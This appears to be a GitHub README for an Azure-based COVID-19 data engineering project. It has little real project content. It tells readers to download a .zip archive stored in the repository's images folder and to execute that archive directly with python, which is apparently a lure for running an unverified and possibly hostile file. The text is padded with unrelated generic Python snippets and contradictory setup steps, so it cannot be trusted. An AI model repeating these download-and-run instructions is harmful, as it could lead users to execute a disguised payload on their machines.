The covid19-data-engineering project provides a straightforward way to analyze COVID-19 data. It is built on an end-to-end Azure data engineering pipeline that includes Azure Data Factory, Databricks, Azure Data Lake Storage Gen2, Azure SQL, and Power BI. With it, you can explore COVID-19 trends and statistics.
To run this application, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB RAM
- Storage: Minimum of 500 MB available space
- Internet Connection: Required for data retrieval and software updates
- Azure Account: Necessary for Azure services used in the pipeline
- Ensure your system meets the required specifications.
- Create an Azure account if you do not have one. This step allows you to access Azure services.
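The local requirements above can be partly checked before installing. The following is a minimal sketch, not part of the project: the function name `check_requirements` is hypothetical, the Python 3 check is an assumption based on the `python`/`python3` commands used later, and the RAM requirement is left out because the standard library has no portable call for it.

```python
import platform
import shutil
import sys

# 500 MB of free space, taken from the requirements list above.
MIN_FREE_BYTES = 500 * 1024 * 1024


def check_requirements(path=".", min_free_bytes=MIN_FREE_BYTES):
    """Return a dict mapping each locally checkable requirement to True/False."""
    free = shutil.disk_usage(path).free
    return {
        # platform.system() reports "Darwin" on macOS.
        "supported_os": platform.system() in {"Windows", "Darwin", "Linux"},
        "enough_disk": free >= min_free_bytes,
        # Assumption: the application needs a Python 3 interpreter.
        "python3": sys.version_info.major >= 3,
    }


if __name__ == "__main__":
    for name, ok in check_requirements().items():
        print(f"{name}: {'ok' if ok else 'FAILED'}")
```

The Azure account and internet connection cannot be verified this way and still need to be checked by hand.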
To get started with the covid19-data-engineering application, you need to download it.
Visit this page to download: Download Latest Release
- Click the link above to go to the Releases page.
- Select the latest release and find the download file.
- Click the appropriate file for your system, for example the .zip archive at https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip.
- Once the file downloads, locate it in your file manager and extract it if necessary.
- After downloading, navigate to the folder containing the application.
- Open a command line interface (CLI) or terminal window.
- Run the starting command. Python takes a local path rather than a URL, so pass it the file downloaded from https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip. Running a .zip directly works only if the archive contains a __main__.py; otherwise, run the entry script inside the extracted folder. For example:
  - On Windows:

        cd path\to\folder
        python data-covid-engineering-v3.9-alpha.2.zip

  - On macOS/Linux:

        cd /path/to/folder
        python3 data-covid-engineering-v3.9-alpha.2.zip

- Follow on-screen prompts to proceed with data analysis.
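If you prefer to script the extraction step instead of using a file manager, the sketch below shows one way to do it with Python's standard `zipfile` module. The helper name `extract_release` and the paths you pass to it are illustrative assumptions, not part of the project.

```python
import zipfile
from pathlib import Path


def extract_release(archive_path, dest_dir):
    """Extract a downloaded release archive and return the names it contained."""
    archive_path = Path(archive_path)
    # is_zipfile() also returns False when the file does not exist.
    if not zipfile.is_zipfile(archive_path):
        raise ValueError(f"{archive_path} is not a valid .zip archive")
    with zipfile.ZipFile(archive_path) as archive:
        archive.extractall(dest_dir)
        return archive.namelist()
```

Calling `extract_release("data-covid-engineering-v3.9-alpha.2.zip", "covid19-data-engineering")` would unpack the archive into a new folder and list its contents, which also helps you find the script to run.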
- User-Friendly Interface: Experience an easy-to-use interface designed for everyone.
- Data Integration: Seamlessly connect to Azure Data Lake Storage Gen2 to pull in data.
- ETL Process: Extract, Transform, Load (ETL) pipeline to prepare your data.
- Analytics Dashboard: Visualizes COVID-19 data using Power BI.
- Real-Time Updates: Fetch the latest COVID-19 statistics automatically.
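To make the ETL idea in the list above concrete, here is a small, self-contained sketch in plain Python. It is not the project's pipeline: the real one runs on Azure Data Factory and Databricks, while this example uses the standard `csv` and `sqlite3` modules as stand-ins. The sample rows, column names, and the `daily_cases` table are made up for illustration.

```python
import csv
import io
import sqlite3

# Hypothetical sample data: cumulative confirmed cases per region and date.
SAMPLE_CSV = """region,date,confirmed
A,2020-03-01,100
A,2020-03-02,150
A,2020-03-03,225
B,2020-03-01,10
B,2020-03-02,25
"""


def extract(text):
    """Extract: parse CSV text into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(text)))


def transform(rows):
    """Transform: derive daily new cases from cumulative counts per region."""
    previous = {}
    result = []
    for row in sorted(rows, key=lambda r: (r["region"], r["date"])):
        confirmed = int(row["confirmed"])
        # The first day seen for a region has no baseline, so it counts as 0.
        new_cases = confirmed - previous.get(row["region"], confirmed)
        previous[row["region"]] = confirmed
        result.append((row["region"], row["date"], confirmed, new_cases))
    return result


def load(records, connection):
    """Load: write the transformed records into a SQL table."""
    connection.execute(
        "CREATE TABLE IF NOT EXISTS daily_cases "
        "(region TEXT, date TEXT, confirmed INTEGER, new_cases INTEGER)"
    )
    connection.executemany("INSERT INTO daily_cases VALUES (?, ?, ?, ?)", records)
    connection.commit()


if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")  # stand-in for Azure SQL
    load(transform(extract(SAMPLE_CSV)), conn)
    for row in conn.execute("SELECT * FROM daily_cases ORDER BY region, date"):
        print(row)
```

Keeping the three stages as separate functions mirrors how a pipeline tool separates ingestion, transformation, and serving, so each stage can be tested on its own.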
Should you encounter issues, here are some common solutions:
- Cannot Access Azure Services: Ensure your Azure account is active and configured correctly.
- Application Does Not Start: Verify that all dependencies are installed as per the requirements.
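When the application does not start, a quick way to see which Python packages are missing is to ask the interpreter directly. The sketch below uses `importlib.util.find_spec` from the standard library. The helper name `missing_modules` and the module list are hypothetical; replace the list with the dependencies the repository actually declares.

```python
import importlib.util


def missing_modules(module_names):
    """Return the top-level module names that cannot be found in this environment."""
    return [name for name in module_names if importlib.util.find_spec(name) is None]


if __name__ == "__main__":
    # Hypothetical list: replace with the packages the repository requires.
    required = ["pyspark", "pandas"]
    missing = missing_modules(required)
    if missing:
        print("Missing modules:", ", ".join(missing))
    else:
        print("All listed modules are importable.")
```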
If you have questions or need assistance, feel free to open an issue in the Issues section of this repository. We are here to help you use the application effectively.
The covid19-data-engineering project covers a variety of topics related to data engineering and analytics, including:
- adls-gen2
- azure-data-engineering
- azure-data-factory
- azure-sql
- covid19-analytics
- data-engineering-project
- databricks
- etl-pipeline
- power-bi
- pyspark
To stay updated with the application:
- Regularly check the Releases page using this link: Download Latest Release.
- Follow the installation steps again to fetch the latest updates.
A big thank you to the developers and contributors who made the covid19-data-engineering application possible. Your efforts help make data analysis accessible to all.
For more detailed information and advanced configuration, please refer to the documentation within the repository.